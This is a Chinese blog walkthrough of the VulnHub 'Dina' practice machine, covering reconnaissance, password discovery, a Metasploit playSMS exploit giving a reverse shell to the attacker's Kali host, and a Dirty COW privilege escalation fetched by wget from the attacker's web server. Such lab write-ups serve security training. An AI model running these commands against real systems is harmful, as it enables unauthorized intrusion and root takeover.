【vulnhub】Dina靶机

最新推荐文章于 2024-09-13 19:41:32 发布
最新推荐文章于 2024-09-13 19:41:32 发布
阅读量314 收藏 3
点赞数 4
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/140859618
版权

靶机安装

下载地址:https://download.vulnhub.com/dina/Dina-1-0-1.ova

运行环境:VMware

目标:提权到root用户,并查看root用户下面的flag

信息收集

进行靶机IP发现

nmap 192.168.7.0/24

进行端口扫描

nmap 192.168.7.140 -A -p-

进行目录扫描

dirsearch -u http://192.168.7.140

IP网址访问,点击之后没有什么可利用的信息

拼接目录/robots.txt

继续拼接文件里面的目录,没有什么可用的信息,只有在nothing目录里有404 NOT FOUND

进行源码检查,发现存在可能像密码的记录,进行保存

拼接/secure ,有一个zip文件

下载这个文件,发现需要密码,用刚才发现的密码尝试,有一个正确的freedom

是一个MP3文件,正常打不开,使用记事本打开,可以找到有url和用户名

在浏览器里后面拼接这个url

是一个登录框,那肯定用户名是touhid ,密码用上面保存的那几个尝试一下,发现diana可以成功

漏洞利用

可以从页面上看到是playsms,那就使用MSF搜一下看看有没有什么漏洞

msfconsole   #开启msf环境
search playsms     #搜索playsms相关漏洞

使用第三个模块(编号为2):use 2

设置攻击参数:

set rhosts 192.168.7.140        #Dina IP(目标IP)

set targeturi /SecreTSMSgatwayLogin        #目标URL

set lhost 192.168.7.47        #kali IP(攻击者IP)

set username touhid        #目标IP的目标URL的登录用户名

set password diana        #目标IP的目标URL的登录密钥、口令

show options   #查看参数设置情况

开始攻击:run

#启动后执行
shell
python -c 'import pty; pty.spawn("/bin/bash")'

切换到靶机有权限的目录下:cd /tmp

#在kali上面搜索脏牛提权的脚本

提权

在kali上面进行下载脏牛的提权脚本

searchsploit 'Dirty COW'  #搜索脏牛提权的脚本

searchsploit -m 文件名字   #进行下载

kali挂一个服务:
python3 -m http.server

靶机:
cd /tmp
wget http://192.168.7.47:8000/40839.c  #远程下载
gcc -pthread 40839.c -o 40839 -lcrypt  #进行编译
./40839  #运行

运行之后设置一个密码

可以从图片上看到一个新的账户名,密码是自己设置的,进行跳转

su firefart

获取flag值

cd /root    #flag值一般都在root用户的/root目录下面
ls
cat flag.txt

wbplife
关注
VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 1077
靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
VulnHub靶机渗透】七:DC-4
野原新之助
04-29 732
靶机设定Web登录界面的弱口令漏洞,以及站点存在命令执行,和sudo的不安全配置问题。VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
vulnhub/Dina
qq_45230030的博客
04-22 292
下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143。
Vulhub靶场之Dina-1.0.1
weixin_45650977的博客
04-30 916
Vulhub靶场之Dina-1.0.1 靶机描述 环境准备 vmware15 打开 攻击机:kali NAT模式 靶机Dina1.0.1 NAT模式
vulnhub-1:Dina
qq_60384876的博客
02-20 980
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。
Dina: 1.0.1靶机
m0_61995767的博客
08-05 438
Dina: 1.0.1打靶记录
靶机渗透测试(Dina: 1.0.1)
@小张小张的博客
12-07 1646
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(====) 描述:It wated for kTheBox flag进度:2/2 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 靶机ip为: 192.168.10.133 2. nmap进行靶机端口服务扫描 命令:
Dina-1-0-1靶机渗透测试
weixin_58786230的博客
08-01 228
发现只开放了80端口。
Dina-1-0-1靶机(乔布斯看了都说好)
zdd1453691081的博客
08-01 245
发现只开放了80端口。
靶机实战-Dina 1.0
滕财然的博客
01-28 1333
Dina 1.0靶机实战 文章目录Dina 1.0靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务5、提权提权方式二 1、主机发现 目标IP:192.168.232.157 2、端口扫描 3、端口详细信息扫描 只开放80端口 4、访问80端口–http服务 主页啥都没有,直接dirb扫一下目录 依次访问目录: index就是主页,就不看了 发现robo...
靶机测试--Dina
ximo的博客
03-28 377
目录信息收集主机发现端口扫描目录扫描漏洞发掘提权总结 信息收集 主机发现 端口扫描 只有80端口: 目录扫描 访问每一个可以访问的路径: 主页: nothing/pass: secure/: 漏洞发掘 得到了一个类似密码字典,一个zip文件。 下载zip文件: 需要密码,使用获得的密码freedom,解压后为mp3格式,但是无法播放: 使用文本打开: 获得了用户名和一个后台,打开: 使用diana可以成功登录: 网站框架为playsms。 搜索CMS漏洞: 有三个属于msf,使用msf
靶机【B2R】Dina-1-0-1
干铮的博客
09-27 482
【B2R】Dina-1-0-1 1.信息收集 根据靶机MAC地址获取IP。 Nmap -sP 192.168.43.0/24 Nmap 192.168.43.91 -A -p- -oN nmap.A 2.网页信息收集 访问站点 御剑扫描敏感目录 敏感目录 http://192.168.43.91/nothing/ 后台备份文件 解压文件尝试使用之前留给的密码 freedom 使用文本打开文件 访问http://192.168.43.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8457
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【双语新闻】AGI安全与对齐,DeepMind近期工作
最新发布
qq_29883477的博客
09-13 677
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 495
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
Boot header格式描述详细信息。CSU DMA用于数据传输。安全流开关允许数据移动。PL配置通过PCAP接口。PL bit流包含设备配置数据。
lsh11111的博客
09-13 352
此外,BootROM可以使用8位并行配置中的宽度检测参数值和image识别参数值来检测Quad-SPI接口的预期I/O宽度。在Quad-SPI引导过程中,BootROM会根据宽度检测参数值来选择相应的I/O配置,以确保正确访问Quad-SPI设备。- Reserved for interrupts: 用于存储中断相关信息,特别是在LQSPI地址空间中的默认0x01F中断向量被更改时,在XIP启动模式下使用。- 安全头初始化向量: 用于PMU FW和FSBL的安全头的初始化向量。
2024网络安全人才实战能力白皮书安全测试评估篇
2301_76786857的博客
09-13 586
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全和社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
Web3 项目安全手册
2301_76786857的博客
09-10 269
现如今针对 Web3 项目的攻击手法层出不穷,且项目之间的交互也越发复杂,在各个项目之间的交互经常会引入新的安全问题,而大部分 Web3 项目研发团队普遍缺少的一线的安全攻防经验,并且在进行 Web3 项目研发的时候,重点关注的是项目整体的商业论证以及业务功能的实现,而没有更多的精力完成安全体系的建设。通常项目方团队为了确保 Web3 项目的安全会聘请优秀的区块链安全团队对其代码进行安全审计,但是区块链安全团队的审计仅仅是短期的引导,并不能让项目方团队建立属于自己的安全体系。
2009年DINA模型详解:参数估计教程
DINA模型及其参数估计是心理学与教育测量领域的一项关键理论,由作者Jimmy de la Torre在2009年的一篇名为《DINAModel and Parameter Estimation: A Didactic》的文章中详细介绍。该模型属于认知诊断理论(Cognitive...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值